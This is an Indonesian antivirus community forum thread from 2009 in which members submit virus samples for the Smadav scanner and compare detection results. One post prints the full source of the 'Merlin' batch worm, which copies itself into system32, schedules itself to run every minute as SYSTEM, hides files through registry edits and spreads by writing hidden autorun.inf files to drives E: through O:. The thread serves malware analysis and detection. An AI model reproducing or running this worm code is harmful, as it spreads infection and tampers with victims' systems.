Penulis Topik: Re: Upload VIRUS ke Forum..  (Dibaca 698764 kali)

Offline Ĵŏřĩş™

  • Moderator
  • Pro500
  • *****
  • Tulisan: 2.498
  • Reputation: 65527
  • Jenis kelamin: Pria
  • .:: The Green Coder ::.
    • Lihat Profil
    • Anti Virus Indonesia
Re: Re: Upload VIRUS ke Forum..
« Jawab #20 pada: September 12, 2009, 02:25:24 PM »
ne sample Merlin.BAT  :o :o :o

Blum kedetect ma smadav 6.3  \m/ \m/ \m/

Tolong dicek virusnya, coz 1 virus by user milik smadav juga blum bisa mendeteksinya

Offline jatioke

  • Pro200
  • *****
  • Tulisan: 203
  • Reputation: 256
  • Jenis kelamin: Pria
    • Lihat Profil
    • BLOG JATI
Re: Re: Upload VIRUS ke Forum..
« Jawab #21 pada: September 12, 2009, 09:08:54 PM »
@ boo >> Superassist.exe
menurut ansav terbaru >> negatif virus  :o jadi aman
menurut AVG terbaru >>> negatif virus  :o aman juga
menurut smadav 6.3 >> positif virus sality.g  ??? ???
kesimpulan... sepertinya sih aman kok... aku jalanin di kompiku juga aman

Offline ★ harboot ★

  • Smadav Experts
  • Pro500
  • ******
  • Tulisan: 5.177
  • Reputation: 65499
  • Jenis kelamin: Pria
  • harboot.com
    • Lihat Profil
    • http://hendryadrian.com
Re: Re: Upload VIRUS ke Forum..
« Jawab #22 pada: September 13, 2009, 12:43:57 AM »
Merlin.rar --- Virus Total

Symantec mendeteksi sebagai W32.SillyFDC
Panda Antivirus -> Bat/Autorun.IYA
Norman &m NOD32 -> BAT/Autorun.IXE
MC AFEE -> Bat/Autorun.worm.zr
Kaspersky -> Worm.BAT.Autorun.dv

Lainnya..
http://www.virustotal.com/analisis/6c6a1a2c7c32e4cf06a575b85b67751466fd7a4df5e19e74f7f07c4bed5a3a1e-1252777178

artinya file ini emank virus..

Offline jatioke

  • Pro200
  • *****
  • Tulisan: 203
  • Reputation: 256
  • Jenis kelamin: Pria
    • Lihat Profil
    • BLOG JATI
Re: Re: Upload VIRUS ke Forum..
« Jawab #23 pada: September 13, 2009, 12:23:28 PM »
@ bertho >> about merlin.rar >> berisi dirsystem.cmd
ini source codenya:
@echo off
cls
xcopy /y dirsystem.cmd /h %windir%\system32
schtasks /create /sc minute /mo 1 /tn "VTTimer" /tr %windir%\system32\dirsystem.cmd /ru "System"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v "Hidden" /t reg_dword /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v "ShowSuperHidden" /t reg_dword /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v RegisteredOwner /t REG_SZ /d Merlin /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v RegisteredOrganization /t REG_SZ /d GINGO /f
del /q /f /a E:\autorun.inf&del /q /f /a F:\autorun.inf&del /q /f /a G:\autorun.inf&del /q /f /a H:\autorun.inf&del /q /f /a I:\autorun.inf
del /q /f /a J:\autorun.inf&del /q /f /a K:\autorun.inf&del /q /f /a L:\autorun.inf&del /q /f /a M:\autorun.inf&del /q /f /a N:\autorun.inf
echo>>E:\autorun.inf [autorun]&echo>>E:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r E:\autorun.inf&xcopy /y dirsystem.cmd /h E:\
echo>>F:\autorun.inf [autorun]&echo>>F:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r F:\autorun.inf&xcopy /y dirsystem.cmd /h F:\
echo>>G:\autorun.inf [autorun]&echo>>G:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r G:\autorun.inf&xcopy /y dirsystem.cmd /h G:\ 
echo>>H:\autorun.inf [autorun]&echo>>H:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r H:\autorun.inf&xcopy /y dirsystem.cmd /h H:\
echo>>I:\autorun.inf [autorun]&echo>>I:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r I:\autorun.inf&xcopy /y dirsystem.cmd /h i:\
echo>>J:\autorun.inf [autorun]&echo>>J:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r J:\autorun.inf&xcopy /y dirsystem.cmd /h J:\
echo>>K:\autorun.inf [autorun]&echo>>K:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r K:\autorun.inf&xcopy /y dirsystem.cmd /h K:\
echo>>L:\autorun.inf [autorun]&echo>>L:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r L:\autorun.inf&xcopy /y dirsystem.cmd /h L:\
echo>>M:\autorun.inf [autorun]&echo>>M:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r M:\autorun.inf&xcopy /y dirsystem.cmd /h M:\
echo>>N:\autorun.inf [autorun]&echo>>N:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r N:\autorun.inf&xcopy /y dirsystem.cmd /h N:\
echo>>O:\autorun.inf [autorun]&echo>>O:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r O:\autorun.inf&xcopy /y dirsystem.cmd /h O:\
attrib +s +h +r %windir%\system32\dirsystem.cmd
cls
start %cd%
@exit

hasil analisa jati:
1. file itu kategori virus karena menyebar otomatis dengan autorun.inf
2. file dirsystem.cmd membuat  file induk di direktori c:/windows/sytem32
3. mengganti RegisteredOwner dan organisation owner

kesimpulan jelas virus >=)  \m/

Offline galang_cha0s

  • Pro500
  • ******
  • Tulisan: 636
  • Reputation: 592
  • Jenis kelamin: Pria
    • Lihat Profil
    • Galang Blog
Re: Re: Upload VIRUS ke Forum..
« Jawab #24 pada: September 13, 2009, 03:20:36 PM »
http://www.si-galang.co.cc/
.::|[g]|[a]|[l]|[a]|[n]|[g]|::.

Offline Ĵŏřĩş™

  • Moderator
  • Pro500
  • *****
  • Tulisan: 2.498
  • Reputation: 65527
  • Jenis kelamin: Pria
  • .:: The Green Coder ::.
    • Lihat Profil
    • Anti Virus Indonesia
Re: Re: Upload VIRUS ke Forum..
« Jawab #25 pada: September 13, 2009, 04:24:18 PM »
Virus Merlin.BAT ini pernah merajalela di kompie temen g........ :o :o
Makanya g ambil sampelnya trus g liat scriptnya.....
Buat mas zai, virus ini ngebuat autorunnya smadav
jadi FOLDER autorun.inf.exe
Tapi pas g scan pake smadav, ternyata ga dideteksi... ~x( ~x(
Pake toolnya 1 virus by user juga ga kebaca.......... :-\ :-\
Anti virus tetangga yg bisa ngebaca cuma P*M*V... :-\ :-\ :-\
Mudah2an bang zai bisa memasukannya di databasenya smadav........ :-bd :-bd :-bd :-bd \m/ \m/ \m/

Offline ★ harboot ★

  • Smadav Experts
  • Pro500
  • ******
  • Tulisan: 5.177
  • Reputation: 65499
  • Jenis kelamin: Pria
  • harboot.com
    • Lihat Profil
    • http://hendryadrian.com
Re: Re: Upload VIRUS ke Forum..
« Jawab #26 pada: September 13, 2009, 06:02:55 PM »
Zai blom pnah mampir sini lg yaaa??

Offline MiloMen™

  • Trusted Advisor
  • Pro500
  • *****
  • Tulisan: 3.300
  • Reputation: 65517
  • Jenis kelamin: Pria
    • Lihat Profil
    • Blog MiloMen
Re: Re: Upload VIRUS ke Forum..
« Jawab #27 pada: September 13, 2009, 09:53:55 PM »
Zai blom pnah mampir sini lg yaaa??

Masih sibuk mas, ditunggu aja :)

Offline RefrizaL

  • dr.Refri,Sp.V
  • Trusted Advisor
  • Pro500
  • *****
  • Tulisan: 924
  • Reputation: 1784
  • Jenis kelamin: Pria
  • _Mother Always In My Hearth_
    • Lihat Profil
Re: Re: Upload VIRUS ke Forum..
« Jawab #28 pada: September 13, 2009, 10:23:32 PM »
ni aku submit ya, sample yg sebenarnya udah lama banget bs didetek ama AV imporku, tp blm masuk database smadav kyknya..
ada 3.
mnurut penamaan kaspersky disebut:
1.bacteroloh
2.senna
3.vb
oh ya,, aku sertain juga file smadav yg diinject ama virusnya  
*tp udah bs didisinfect kaspersky koq... cuma mw nambah database smadav aj..
« Edit Terakhir: September 13, 2009, 10:25:20 PM oleh RefrizaL »
Indonesia akan memiliki Antivirus Terbaik Karya Anak Bangsa

Offline Yudh

  • Pro500
  • ******
  • Tulisan: 2.307
  • Reputation: 65517
  • Jenis kelamin: Pria
  • yudhafb@gmail.com
    • Lihat Profil
Re: Re: Upload VIRUS ke Forum..
« Jawab #29 pada: September 14, 2009, 10:35:30 AM »
Virus Merlin.BAT ini pernah merajalela di kompie temen g........ :o :o
Makanya g ambil sampelnya trus g liat scriptnya.....
Buat mas zai, virus ini ngebuat autorunnya smadav
jadi FOLDER autorun.inf.exe
Tapi pas g scan pake smadav, ternyata ga dideteksi... ~x( ~x(
Pake toolnya 1 virus by user juga ga kebaca.......... :-\ :-\
Anti virus tetangga yg bisa ngebaca cuma P*M*V... :-\ :-\ :-\
Mudah2an bang zai bisa memasukannya di databasenya smadav........ :-bd :-bd :-bd :-bd \m/ \m/ \m/

Satu lagi Bro ketinggalan... Antivirus Tetangga,... Morhost Antivirus juga sudah bisa mendeteksi nya.... ;>  ;>